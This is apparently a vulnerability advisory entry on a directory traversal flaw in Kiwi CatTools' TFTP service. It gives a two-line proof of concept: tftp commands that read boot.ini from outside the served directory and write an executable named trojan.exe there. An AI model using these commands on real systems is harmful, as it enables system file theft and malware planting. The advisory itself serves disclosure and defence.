• info
• discussion
• exploit
• solution
• references

Kiwi CatTools TFTP Directory Traversal Vulnerability

Attackers may exploit this vulnerability via a TFTP client.

The following proof of concept is available:

tftp -i 10.11.12.13 GET a//..//..//..//..//..//boot.ini
tftp -i 10.11.12.13 PUT foo.exe a//..//trojan.exe